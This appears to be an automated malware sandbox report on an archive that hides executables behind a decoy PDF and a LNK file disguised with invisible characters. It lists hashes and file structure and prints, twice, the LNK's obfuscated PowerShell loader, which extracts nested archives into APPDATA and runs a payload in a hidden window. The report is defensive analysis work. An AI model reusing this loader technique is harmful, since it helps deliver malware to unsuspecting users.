Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
04211efadec71f50f7b33026d7d301b5
Sha1
4fcfbef356590b1796ba9f5662deb5e1909ddb48
Sha256
5a607965caac6829cf9327c795fb18ae6a318e687a2fdc922222f3c0de167cbf
Sha384
bb2f4972327e7ee5c8bb969b155a01502e17ea201de06aaae3c27e797e63117ef59d3c3295878e50be9446e536ca0595
Sha512
c4c96924138fda3317a58c5336d192a5b3563e263eed77f745fdda7243a0abb6ff260ed784dc140e6dc65c37d23ba1ab30ae85f3aaf6ac24aac29d0e506ea465
SSDeep
393216:6oq22f5BFLDQSv+nSAKV0VMvVt8iHK9m2/8rzk:6YAFbG9Y0uVq9nkHk
TLSH
81D6332C75A62847A7E821BB74A44FE4B23440713F59C053AA53CB99F2A70E58F53C7B
File Structure
04211efadec71f50f7b33026d7d301b5
Malicious
$RECYCLE.BIN
temporaryAssetGroup
goland.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
initialLicenseOption
lastEntryThreshold
ishod_6726_dolzhnost.pdf
Text (Preview)
Page #1
#Stream {4}
#Stream {8}
#Stream {12}
#Stream {13}
Structure
listErrorArray.xml
detailInstance
statusCapacity
ssh-shellhost.exe
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
libcrypto.dll
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
twitter.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
nextWarningTag
eventFunction
avgKeyCategory
externalEventTag
localUrlTag.xml
sublimetext.exe
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
rating
detailInstance.pub
tag
trello.exe
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
ishod_6726_dolzhnost.​‍​​pdf​‌​​​.lnk
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Informations
Name
 Value
ishod_6726_dolzhnost.pdf

1.7
ishod_6726_dolzhnost.pdf

D:20260410115505+03'00'
ishod_6726_dolzhnost.pdf

Adobe Acrobat 11.0.4
ishod_6726_dolzhnost.pdf

D:20260410115510+03'00'
ishod_6726_dolzhnost.pdf

Adobe Acrobat 11.0.4 Image Conversion Plug-in
ishod_6726_dolzhnost.pdf

D:20260410115505+03'00'
ishod_6726_dolzhnost.pdf

Adobe Acrobat 11.0.4
ishod_6726_dolzhnost.pdf

D:20260410115510+03'00'
ishod_6726_dolzhnost.pdf

Adobe Acrobat 11.0.4 Image Conversion Plug-in
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe $temporaryUserFunction=([array](where.exe /R $env:userprofile 'ishod_6726_dolzhnost*.zip'))[0].Trim(); &('Exp' + 'and-' + 'Arch' + 'ive') $temporaryUserFunction -D $env:APPDATA\inactivePostTitle; $temporaryUserFunction=$env:APPDATA+'\inactivePostTitle\$RECYCLE.BIN\temporaryAssetGroup'; ren $temporaryUserFunction -N ($temporaryUserFunction+'.zip'); &('Exp' + 'and-' + 'Arch' + 'ive') ($temporaryUserFunction+'.zip') -D $env:APPDATA\atom; Start-Process -WindowStyle Hidden ('po' + 'we' + 'rsh' + 'ell') (gc $env:APPDATA\atom\eventFunction)
04211efadec71f50f7b33026d7d301b5 (12.74 MB)
File Structure
04211efadec71f50f7b33026d7d301b5
Malicious
$RECYCLE.BIN
temporaryAssetGroup
goland.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
initialLicenseOption
lastEntryThreshold
ishod_6726_dolzhnost.pdf
Text (Preview)
Page #1
#Stream {4}
#Stream {8}
#Stream {12}
#Stream {13}
Structure
listErrorArray.xml
detailInstance
statusCapacity
ssh-shellhost.exe
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
libcrypto.dll
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
twitter.exe
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
nextWarningTag
eventFunction
avgKeyCategory
externalEventTag
localUrlTag.xml
sublimetext.exe
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
rating
detailInstance.pub
tag
trello.exe
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
ishod_6726_dolzhnost.​‍​​pdf​‌​​​.lnk
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe $temporaryUserFunction=([array](where.exe /R $env:userprofile 'ishod_6726_dolzhnost*.zip'))[0].Trim(); &('Exp' + 'and-' + 'Arch' + 'ive') $temporaryUserFunction -D $env:APPDATA\inactivePostTitle; $temporaryUserFunction=$env:APPDATA+'\inactivePostTitle\$RECYCLE.BIN\temporaryAssetGroup'; ren $temporaryUserFunction -N ($temporaryUserFunction+'.zip'); &('Exp' + 'and-' + 'Arch' + 'ive') ($temporaryUserFunction+'.zip') -D $env:APPDATA\atom; Start-Process -WindowStyle Hidden ('po' + 'we' + 'rsh' + 'ell') (gc $env:APPDATA\atom\eventFunction)

Malicious

04211efadec71f50f7b33026d7d301b5 > ishod_6726_dolzhnost.​‍​​pdf​‌​​​.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙